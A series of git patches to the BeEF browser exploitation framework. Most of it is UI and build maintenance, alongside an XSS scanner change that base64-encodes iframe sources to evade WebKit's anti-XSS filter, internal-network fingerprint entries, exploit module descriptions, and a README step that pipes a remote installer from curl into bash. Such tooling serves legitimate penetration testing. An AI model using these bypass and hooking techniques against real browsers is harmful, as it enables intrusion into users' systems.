From 74d176ff73984d6450a4bae35077b87650411a5e Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 15 Feb 2012 13:16:13 +0100 Subject: [PATCH 01/16] Fixed issue 34: now only one zombie tab is created (current browser). When switching between browsers, the previous zombiePanel is destroyed. --- .../media/javascript/ui/panel/ZombieTab.js | 14 ++++++-------- .../admin_ui/media/javascript/ui/panel/common.js | 13 +++++++------ .../javascript/ui/panel/tabs/ZombieTabCommands.js | 8 ++++++-- .../media/javascript/ui/panel/zombiesTreeList.js | 7 ++++--- 4 files changed, 23 insertions(+), 19 deletions(-) diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js index fda43b095..cea031726 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js +++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js @@ -21,27 +21,25 @@ ZombieTab = function(zombie) { requester_tab = new ZombieTab_Requester(zombie); xssrays_tab = new ZombieTab_XssRaysTab(zombie); - //------------------------------------------- ZombieTab.superclass.constructor.call(this, { - id: zombie.session, + id:"current-browser", activeTab: 0, loadMask: {msg:'Loading browser...'}, - title: zombie.ip, + title: "Current Browser", autoScroll: true, - closable: true, + closable: false, viewConfig: { forceFit: true, type: 'fit' }, items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab] }); - }; Ext.extend(ZombieTab, Ext.TabPanel, { listeners: { - close: function(panel) { - panel.destroy(); - } + activate: function(panel) {}, + deactivate: function(panel) {}, + close: function(panel) {} } }); diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js index 1ffa07a39..3e56cfea8 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/common.js +++ b/extensions/admin_ui/media/javascript/ui/panel/common.js @@ -132,7 +132,8 @@ function get_dynamic_payload_details(payload, zombie) { generate_form_input_field(Ext.getCmp("payload-panel"), input, null, false, zombie); }); - Ext.getCmp("payload-panel").doLayout(); + Ext.getCmp("payload-panel").doLayout(); + console.log("========payloadPanel.doLayout=============="); } }) } @@ -146,6 +147,7 @@ function get_dynamic_payload_details(payload, zombie) { * @param: {Object} the status bar. */ function genExisingExploitPanel(panel, command_id, zombie, sb) { + console.log("genExisingExploitPanel========" + zombie.session); if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; @@ -297,6 +299,7 @@ function genExisingExploitPanel(panel, command_id, zombie, sb) { * @param: {Object} the status bar. */ function genNewExploitPanel(panel, command_module_id, command_module_name, zombie, sb) { + if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; @@ -327,9 +330,8 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi } module = module.command_modules[1]; - panel.removeAll(); - - var form = new Ext.form.FormPanel({ + + var form = new Ext.form.FormPanel({ url: submiturl, id: 'form-command-module-zombie-'+zombie.session, @@ -394,7 +396,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi bodyBorder: false, height: 200, hidden: true, - border: false //we can remove the border of the panel + border: false //we can remove the border of the panel }); Ext.each(module.Data, function(input){ @@ -402,7 +404,6 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi ); form.add(payload_panel); - panel.add(form); panel.doLayout(); // hide the load mask after rendering of the config panel is done diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js index b9e0dabc1..c4b6c6ff5 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js @@ -95,7 +95,7 @@ ZombieTab_Commands = function(zombie) { nonce: Ext.get ("nonce").dom.value } }); - + genNewExploitPanel(command_module_config, node.id, node.text, zombie, commands_statusbar); commands_statusbar.showValid('Ready'); } @@ -189,4 +189,8 @@ ZombieTab_Commands = function(zombie) { var sb = Ext.getCmp('command-module-bbar-zombie-'+zombie.session); }; -Ext.extend(ZombieTab_Commands, Ext.Panel, {}); +Ext.extend(ZombieTab_Commands, Ext.Panel, { + listeners: { + close: function(panel) {} + } +}); diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js index 9cbe9ecc3..5537ee34e 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js +++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js @@ -113,12 +113,13 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { //creates a new hooked browser tab when a hooked browser is clicked click: function(node, e) { if(!node.leaf) return; - - if(!mainPanel.get(node.attributes.session)) { + + mainPanel.remove(mainPanel.getComponent('current-browser')); + if(!mainPanel.getComponent('current-browser')) { mainPanel.add(new ZombieTab(node.attributes)); } - mainPanel.activate(node.attributes.session); + mainPanel.activate(mainPanel.getComponent('current-browser')); }, //show the context menu when a HB is right-clicked contextmenu: function(node, event){ From 1d74d7eeab405cca13e4b48eb2c9635807a6f298 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 15 Feb 2012 13:28:17 +0100 Subject: [PATCH 02/16] Fixed a serious bug in beef.net.request when sending cross-domain POST data. jQuery is automatically changing the method to GET if the dataType (that was hardcoded in our code) is set to 'script'. --- core/main/client/net.js | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/core/main/client/net.js b/core/main/client/net.js index 9f84f5acc..b5340d472 100644 --- a/core/main/client/net.js +++ b/core/main/client/net.js @@ -168,9 +168,22 @@ beef.net = { response.was_cross_domain = cross_domain; var start_time = new Date().getTime(); + /* + * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script': + * This will turn POSTs into GETs for remote-domain requests. + */ + if (method == "POST"){ + $j.ajaxSetup({ + dataType: dataType + }); + }else{ //GET, HEAD, ... + $j.ajaxSetup({ + dataType: 'script' + }); + } + //build and execute the request $j.ajax({type: method, - dataType: 'script', // this is required for bugs in IE so data can be transferred back to the server url: url, data: data, timeout: (timeout * 1000), From 55b52427e838da629851d448027afc533dbcccf2 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 15 Feb 2012 14:09:53 +0100 Subject: [PATCH 03/16] re-added panel.removeAll when generating a newExploitPanel, corrected typo on function name genExistingExploitPanel --- extensions/admin_ui/media/javascript/ui/panel/common.js | 8 ++++---- .../media/javascript/ui/panel/tabs/ZombieTabCommands.js | 2 +- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js index 3e56cfea8..e7090adb3 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/common.js +++ b/extensions/admin_ui/media/javascript/ui/panel/common.js @@ -146,8 +146,8 @@ function get_dynamic_payload_details(payload, zombie) { * @param: {Object} the targeted Zombie. * @param: {Object} the status bar. */ -function genExisingExploitPanel(panel, command_id, zombie, sb) { - console.log("genExisingExploitPanel========" + zombie.session); +function genExistingExploitPanel(panel, command_id, zombie, sb) { + console.log("genExistingExploitPanel========" + zombie.session); if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; @@ -299,7 +299,7 @@ function genExisingExploitPanel(panel, command_id, zombie, sb) { * @param: {Object} the status bar. */ function genNewExploitPanel(panel, command_module_id, command_module_name, zombie, sb) { - + console.log("genNewExploitPanel========" + zombie.session); if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; @@ -307,7 +307,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi var xgrid = Ext.getCmp('command-module-grid-zombie-'+zombie.session); var sb = Ext.getCmp('commands-bbar-zombie-'+zombie.session); - + panel.removeAll(); if(command_module_name == 'some special command module') { //HERE we will develop specific panels for the command modules that require it. } else { diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js index c4b6c6ff5..0a81de564 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js @@ -77,7 +77,7 @@ ZombieTab_Commands = function(zombie) { if(!command_id) return; - genExisingExploitPanel(command_module_config, command_id, zombie, commands_statusbar); + genExistingExploitPanel(command_module_config, command_id, zombie, commands_statusbar); }); LoadCommandPanelEvent = function(node,keyclick) { From d9104b93f4983b1645884651b184febfa39c7904 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 15 Feb 2012 14:12:43 +0100 Subject: [PATCH 04/16] removed console.log function calls that were throwing errors on IE --- extensions/admin_ui/media/javascript/ui/panel/common.js | 3 --- .../media/javascript/ui/panel/tabs/ZombieTabCommands.js | 4 ---- .../admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js | 2 -- 3 files changed, 9 deletions(-) diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js index e7090adb3..df8129193 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/common.js +++ b/extensions/admin_ui/media/javascript/ui/panel/common.js @@ -133,7 +133,6 @@ function get_dynamic_payload_details(payload, zombie) { }); Ext.getCmp("payload-panel").doLayout(); - console.log("========payloadPanel.doLayout=============="); } }) } @@ -147,7 +146,6 @@ function get_dynamic_payload_details(payload, zombie) { * @param: {Object} the status bar. */ function genExistingExploitPanel(panel, command_id, zombie, sb) { - console.log("genExistingExploitPanel========" + zombie.session); if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; @@ -299,7 +297,6 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) { * @param: {Object} the status bar. */ function genNewExploitPanel(panel, command_module_id, command_module_name, zombie, sb) { - console.log("genNewExploitPanel========" + zombie.session); if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js index 0a81de564..bf9bb7357 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js @@ -139,16 +139,12 @@ ZombieTab_Commands = function(zombie) { 'afterrender' : function() { }, 'selectionchange' : function() { - console.log("selection changed"); }, 'activate' : function() { - console.log("activate"); }, 'select' : function() { - console.log("select"); }, 'keyup' : function() { - console.log("Key up"); }, 'render' : function(c) { c.getEl().on('keyup', function() { diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js index 1dd8b8f09..6d7eaf5dc 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js @@ -102,8 +102,6 @@ ZombieTab_Requester = function(zombie) { // itemclick: function(item) { // switch (item.id) { // case 'do-something': -// console.log("history_panel_context_menu.rowIndex: " + history_panel_context_menu.rowIndex); -// console.log("history_panel_context_menu.dbIndex: " + history_panel_context_menu.dbIndex); // break; // } // } From 9489e3c591ff1de4617d97d0a546dc803ef3387c Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Tue, 24 Jan 2012 19:59:15 +0100 Subject: [PATCH 05/16] moved imap ipec modules in a proper directory, added a note to imap ipec module about portbanning. --- modules/ipec/{ => inter_protocol_imap}/command.js | 0 modules/ipec/{ => inter_protocol_imap}/config.yaml | 2 +- modules/ipec/{ => inter_protocol_imap}/module.rb | 0 3 files changed, 1 insertion(+), 1 deletion(-) rename modules/ipec/{ => inter_protocol_imap}/command.js (100%) rename modules/ipec/{ => inter_protocol_imap}/config.yaml (89%) rename modules/ipec/{ => inter_protocol_imap}/module.rb (100%) diff --git a/modules/ipec/command.js b/modules/ipec/inter_protocol_imap/command.js similarity index 100% rename from modules/ipec/command.js rename to modules/ipec/inter_protocol_imap/command.js diff --git a/modules/ipec/config.yaml b/modules/ipec/inter_protocol_imap/config.yaml similarity index 89% rename from modules/ipec/config.yaml rename to modules/ipec/inter_protocol_imap/config.yaml index 618bd3255..214fa4152 100644 --- a/modules/ipec/config.yaml +++ b/modules/ipec/inter_protocol_imap/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: "IPEC" name: "IMAP" - description: "Using Inter-protocol Communication (IPEC) zombie browser will send commands to an IMAP4 server. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet." + description: "Using Inter-protocol Communication (IPEC) zombie browser will send commands to an IMAP4 server. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet. Have in mind that browser Port Banning is denying connections to default IMAP port 143." authors: ["jgaliana", "wade"] target: working: ["FF", "C", "S", "O"] diff --git a/modules/ipec/module.rb b/modules/ipec/inter_protocol_imap/module.rb similarity index 100% rename from modules/ipec/module.rb rename to modules/ipec/inter_protocol_imap/module.rb From 1d7ad568d24e4e27c0fe80fc3580d12c5eea8f44 Mon Sep 17 00:00:00 2001 From: Wade Alcorn Date: Sun, 29 Jan 2012 13:33:36 +1000 Subject: [PATCH 06/16] Minor formatting update --- core/api/extensions.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/core/api/extensions.rb b/core/api/extensions.rb index fccda07d8..5d5be8cb2 100644 --- a/core/api/extensions.rb +++ b/core/api/extensions.rb @@ -23,9 +23,8 @@ module BeEF } # API hook fired after all extensions have been loaded - def post_load; end - - + def post_load; + end end end From 805e8c8af1eaa64f24c6af1532d39df7ccd0b0c6 Mon Sep 17 00:00:00 2001 From: bcoles Date: Wed, 1 Feb 2012 23:11:05 +1030 Subject: [PATCH 07/16] Added fingerprints to Fingerprint Network module --- .../network/internal_network_fingerprinting/command.js | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js index 01853359c..71d742f55 100644 --- a/modules/network/internal_network_fingerprinting/command.js +++ b/modules/network/internal_network_fingerprinting/command.js @@ -88,6 +88,15 @@ beef.execute(function() { new Array("VMware ESXi Server",":80",false,"/background.jpeg",1,1100), new Array("Microsoft Remote Web Workplace",":80",false,"/Remote/images/submit.gif",31,31), new Array("XAMPP",":80",false,"/xampp/img/xampp-logo-new.gif",200,59), + new Array("Xerox Printer",":80",false,"/printbut.gif",30,30), + new Array("Konica Minolta Printer",":80",false,"/G27_light.gif",206,26), + new Array("Epson Printer",":80",false,"/cyandot.gif",1,1), + new Array("HP Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52), + new Array("Syncrify",":5800",false,"/images/468x60.gif",468,60), + new Array("Winamp Web Interface",":80",false,"/img?image=121",30,30), + new Array("Zenoss Core",":8080",false,"/zport/dmd/favicon.ico",16,16), + new Array("BeEF",":3000",false,"/ui/media/images/beef.png",200,149), + new Array("BeEF (PHP)",":80",false,"/beef/images/beef.gif",32,32), new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16) ); From e8d729335000092530b27e42931e949e5e1d9437 Mon Sep 17 00:00:00 2001 From: Saafan Date: Mon, 6 Feb 2012 12:00:08 +0200 Subject: [PATCH 08/16] Listening to loopback only. Fixes issue #594 --- test/thirdparty/msf/unit/BeEF.rc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/thirdparty/msf/unit/BeEF.rc b/test/thirdparty/msf/unit/BeEF.rc index 326dc1681..fdedac018 100644 --- a/test/thirdparty/msf/unit/BeEF.rc +++ b/test/thirdparty/msf/unit/BeEF.rc @@ -1,2 +1,2 @@ -load msgrpc Pass=abc123 +load msgrpc ServerHost=127.0.0.1 Pass=abc123 From 61763ff103bfab9b3cd6f08c834c03bdee37baa9 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Tue, 7 Feb 2012 02:03:34 +0100 Subject: [PATCH 09/16] commented out require of selenium gem. not needed and throws errors on Mac OSX --- test/common/beef_test.rb | 3 +-- test/integration/ts_integration.rb | 1 - 2 files changed, 1 insertion(+), 3 deletions(-) diff --git a/test/common/beef_test.rb b/test/common/beef_test.rb index 460785e71..cdf13b86f 100644 --- a/test/common/beef_test.rb +++ b/test/common/beef_test.rb @@ -4,7 +4,6 @@ require 'capybara' Capybara.run_server = false # we need to run our own BeEF server require 'selenium/webdriver' -require "selenium" class BeefTest @@ -41,4 +40,4 @@ class BeefTest victim end -end \ No newline at end of file +end diff --git a/test/integration/ts_integration.rb b/test/integration/ts_integration.rb index b23d5d5fb..917de1324 100644 --- a/test/integration/ts_integration.rb +++ b/test/integration/ts_integration.rb @@ -21,7 +21,6 @@ require 'capybara' Capybara.run_server = false # we need to run our own BeEF server require 'selenium/webdriver' -require "selenium" require './check_environment' # Basic log in and log out tests require './tc_login' # Basic log in and log out tests From 4a92d3174ce1445ceec0c5c2edaf5beaf7672bbc Mon Sep 17 00:00:00 2001 From: Christian Frichot Date: Tue, 7 Feb 2012 21:24:02 +0800 Subject: [PATCH 10/16] Removed extended_in_modules code. See Issue #147 --- core/main/command.rb | 9 --------- core/ruby/module.rb | 18 ------------------ 2 files changed, 27 deletions(-) diff --git a/core/main/command.rb b/core/main/command.rb index fab0f965e..9336ff420 100644 --- a/core/main/command.rb +++ b/core/main/command.rb @@ -57,7 +57,6 @@ module Core # Super class controller # @param [String] key command module key def initialize(key) - get_extensions config = BeEF::Core::Configuration.instance @key = key @@ -72,14 +71,6 @@ module Core @beefjs_components = {} end - # Uses the API to include all the code from extensions that need to add methods, constants etc to that class. - # @todo Determine if this method is deprecated - def get_extensions - BeEF::API::Command.extended_in_modules.each do |mod| - self.class.send(:include, mod) - end - end - # This function is called just before the instructions are sent to hooked browser. def pre_send; end diff --git a/core/ruby/module.rb b/core/ruby/module.rb index 4aaba8e7e..d7e0ae3b7 100644 --- a/core/ruby/module.rb +++ b/core/ruby/module.rb @@ -38,22 +38,4 @@ class Module unique_modules end end - - # Returns the modules extended inside the target module - # @return [Array] Array of modules - def extended_modules - (class << self; self end).included_modules - end - - # Returns the modules extending the target module - # @return [Array] Array of modules - def extended_in_modules - modules = [] - ObjectSpace.each_object(Module) { |k| modules << k if k.extended_modules.include?(self) } - - modules.reverse.inject([]) do |unique_modules, klass| - unique_modules << klass unless unique_modules.collect { |k| k.to_s }.include?(klass.to_s) - unique_modules - end - end end From e5aa0671a1d5a9d9d5561392e3507196fc2c4beb Mon Sep 17 00:00:00 2001 From: bcoles Date: Thu, 9 Feb 2012 23:01:14 +1030 Subject: [PATCH 11/16] Removed "notes:" node from three module config.yaml files --- modules/exploits/safari_launch_app/config.yaml | 3 +-- modules/host/detect_protocol_handlers/config.yaml | 3 +-- modules/ipec/window_mail_client_dos/config.yaml | 3 +-- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/modules/exploits/safari_launch_app/config.yaml b/modules/exploits/safari_launch_app/config.yaml index 1099bb595..25840021b 100755 --- a/modules/exploits/safari_launch_app/config.yaml +++ b/modules/exploits/safari_launch_app/config.yaml @@ -19,8 +19,7 @@ beef: enable: true category: "Exploits" name: "Safari Launch App" - description: "Launch an application from the victim machine.

See CVE-2011-3230 for more details." - notes: "Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230" + description: "Launch an application from the victim machine.

See CVE-2011-3230 for more details.

Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230" authors: ["antisnatchor"] target: user_notify: ["S"] diff --git a/modules/host/detect_protocol_handlers/config.yaml b/modules/host/detect_protocol_handlers/config.yaml index baf8fe08d..a3de123a2 100644 --- a/modules/host/detect_protocol_handlers/config.yaml +++ b/modules/host/detect_protocol_handlers/config.yaml @@ -19,8 +19,7 @@ beef: enable: true category: "Host" name: "Get Protocol Handlers" - description: "This module attempts to identify protocol handlers present on the hooked browser." - notes: "Only Internet Explorer and Firefox are supported.

Firefox users are prompted to launch the application for which the protocol handler is responsible.

Firefox users are warned when there is no application assigned to a protocol handler.



The possible return values are: unknown, exists, does not exist" + description: "This module attempts to identify protocol handlers present on the hooked browser. Only Internet Explorer and Firefox are supported.

Firefox users are prompted to launch the application for which the protocol handler is responsible.

Firefox users are warned when there is no application assigned to a protocol handler.



The possible return values are: unknown, exists, does not exist." authors: ["bcoles"] target: working: ["IE"] diff --git a/modules/ipec/window_mail_client_dos/config.yaml b/modules/ipec/window_mail_client_dos/config.yaml index d7be2489d..8f1b007bc 100644 --- a/modules/ipec/window_mail_client_dos/config.yaml +++ b/modules/ipec/window_mail_client_dos/config.yaml @@ -19,8 +19,7 @@ beef: enable: true category: "IPEC" name: "Windows Mail Client DoS" - description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.

Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's vulnerable also in Win7-sp2)." - notes: "The protocol handler used will be: nntp.

" + description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.

Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's vulnerable also in Windows 7 SP2).

The protocol handler used will be: nntp." authors: ["bcoles"] target: user_notify: ["FF", "S"] From 58f2b4f7a1125f213e2629dfbcf9c05ed7113185 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Sun, 12 Feb 2012 11:49:38 +0100 Subject: [PATCH 12/16] Added detection of Chrome 17 --- core/main/client/browser.js | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/core/main/client/browser.js b/core/main/client/browser.js index abd8ae49c..4a77daf71 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -286,12 +286,20 @@ beef.browser = { return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==16)?true:false); }, + /** + * Returns true if Chrome 17. + * @example: beef.browser.isC17() + */ + isC17: function() { + return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false); + }, + /** * Returns true if Chrome. * @example: beef.browser.isC() */ isC: function() { - return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16(); + return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17(); }, /** @@ -355,6 +363,7 @@ beef.browser = { C14: this.isC14(), // Chrome 14 C15: this.isC15(), // Chrome 15 C16: this.isC16(), // Chrome 16 + C17: this.isC17(), // Chrome 16 C: this.isC(), // Chrome any version FF2: this.isFF2(), // Firefox 2 @@ -408,6 +417,7 @@ beef.browser = { if (this.isC14()) { return '14' }; // Chrome 14 if (this.isC15()) { return '15' }; // Chrome 15 if (this.isC16()) { return '16' }; // Chrome 16 + if (this.isC17()) { return '17' }; // Chrome 17 if (this.isFF2()) { return '2' }; // Firefox 2 From 5bc6745e03d6f9dd44115ed25ec39e5d31ae1606 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Sun, 12 Feb 2012 13:45:35 +0100 Subject: [PATCH 13/16] Fixed issue 66: base64'ed the iframe src in case of Chrome/Safari to bypass the webkit anti-XSS filter --- core/main/client/net/xssrays.js | 31 +++++++++++++++++++++++++------ 1 file changed, 25 insertions(+), 6 deletions(-) diff --git a/core/main/client/net/xssrays.js b/core/main/client/net/xssrays.js index dad90c014..2db324759 100644 --- a/core/main/client/net/xssrays.js +++ b/core/main/client/net/xssrays.js @@ -308,7 +308,10 @@ beef.net.xssrays = { var ray = this.rays[beef.net.xssrays.uniqueID]; var paramsPos = 0; - if (params != null) { // check for XSS in GET parameters + if (params != null) { + /* + * ++++++++++ check for XSS in URI parameters (GET) ++++++++++ + */ for (var i in params) { if (params.hasOwnProperty(i)) { @@ -328,12 +331,19 @@ beef.net.xssrays = { exploit = vector.input.replace(/XSS/g, beefCallback); - url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&'; + if(beef.browser.isC() || beef.browser.isS()){ //we will base64 the whole uri later + url += i + '=' + exploit + '&'; + }else{ + url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&'; + } paramsPos++; } } - } else { // check for XSS in GET URL path + } else { + /* + * ++++++++++ check for XSS in URI path (GET) ++++++++++ + */ var filename = beef.net.xssrays.fileName(url); poc = vector.input.replace(/XSS/g, "alert(1)"); @@ -352,8 +362,9 @@ beef.net.xssrays = { //TODO: this need to checked and the slash shouldn't be added in this particular case url = url.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/'); } - - + /* + * ++++++++++ create the iFrame that will contain the attack vector ++++++++++ + */ var iframe = document.createElement('iframe'); iframe.style.display = 'none'; iframe.id = 'ray' + beef.net.xssrays.uniqueID; @@ -361,10 +372,18 @@ beef.net.xssrays = { iframe.name = 'ray' + Math.random().toString(); if (method === 'GET') { - iframe.src = url; + if(beef.browser.isC() || beef.browser.isS()){ + var datauri = btoa(url); + iframe.src = "data:text/html;base64," + datauri; + }else{ + iframe.src = url; + } document.body.appendChild(iframe); beef.net.xssrays.printDebug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]"); } else if (method === 'POST') { + /* + * ++++++++++ check for XSS in body parameters (POST) ++++++++++ + */ var form = '
'; poc = ''; pocurl = action + "?"; From 3ad2dbb3c7de5f72803eb27602edd8c0ebbeeab7 Mon Sep 17 00:00:00 2001 From: Ben Date: Wed, 15 Feb 2012 17:52:08 +1000 Subject: [PATCH 14/16] Rake task to generate DMG image --- Rakefile | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/Rakefile b/Rakefile index af804db80..96aa5c920 100644 --- a/Rakefile +++ b/Rakefile @@ -135,3 +135,20 @@ file '/tmp/msf-test/msfconsole' do sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test" end + +################################ +# Create Mac DMG File + +task :dmg do + puts "\nCreating Working Directory\n"; + sh "mkdir dmg"; + sh "mkdir dmg/BeEF"; + sh "rsync * dmg/BeEF --exclude=dmg -r"; + sh "ln -s /Applications dmg/"; + puts "\nCreating DMG File\n" + sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov"; + puts "\nCleaning Up\n" + sh "rm -r dmg"; + puts "\nBeEF.dmg created\n" +end + From 667d00351d34ddd8d726465917c2fd2ead75e650 Mon Sep 17 00:00:00 2001 From: Ben Date: Wed, 15 Feb 2012 17:52:54 +1000 Subject: [PATCH 15/16] Updated README instructions for MAC OS X --- README | 9 +++++++-- beef | 2 +- install | 2 +- 3 files changed, 9 insertions(+), 4 deletions(-) diff --git a/README b/README index 7ed98f998..38a31d15e 100644 --- a/README +++ b/README @@ -53,8 +53,13 @@ Most of the contents of this file will eventually be added to /install.rb. In th 4. Prerequisites (Mac OSX) - Make sure you have XCode installed - which provided the sqlite support BeEF needs - Sqlite support is native in MacOS 10.6+ + - XCode: provides the sqlite support BeEF needs + + - Ruby 1.9 + To install RVM and Ruby 1.9.3 on Mac OS: + $ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile + $ rvm install 1.9.3-p0 --with-gcc=clang + $ rvm use 1.9.3 5. Install instructions diff --git a/beef b/beef index fe37f45af..f55a3a8c4 100755 --- a/beef +++ b/beef @@ -24,7 +24,7 @@ if RUBY_VERSION < '1.9' puts "\n" puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later." puts "OSX:" - puts "sudo port install ruby19 +nosuffix" + puts "See Readme" puts "\n" exit end diff --git a/install b/install index e7039844b..b0165bde0 100755 --- a/install +++ b/install @@ -23,7 +23,7 @@ if RUBY_VERSION < '1.9' puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later." puts "" puts "OSX:" - puts "sudo port install ruby19 +nosuffix" + puts "See README" puts "\n" exit end From 2715e0400cf72bbd183d79815f4a51edbb1331c3 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 15 Feb 2012 15:05:45 +0100 Subject: [PATCH 16/16] added browser type,version and OS to console output when a new browser is hooked in BeEF --- extensions/initialization/handler.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/extensions/initialization/handler.rb b/extensions/initialization/handler.rb index bcd16bf50..c6dd1d66b 100644 --- a/extensions/initialization/handler.rb +++ b/extensions/initialization/handler.rb @@ -81,7 +81,6 @@ module BeEF # add a log entry for the newly hooked browser BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}") - # get and store browser name browser_name = get_param(@data['results'], 'BrowserName') if BeEF::Filters.is_valid_browsername?(browser_name) @@ -274,6 +273,10 @@ module BeEF self.err_msg "Invalid value for hasPersistentCookies returned from the hook browser's initial connection." end + # log a few info of newly hooked zombie in the console + print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]" + + # Call autorun modules autorun = [] BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|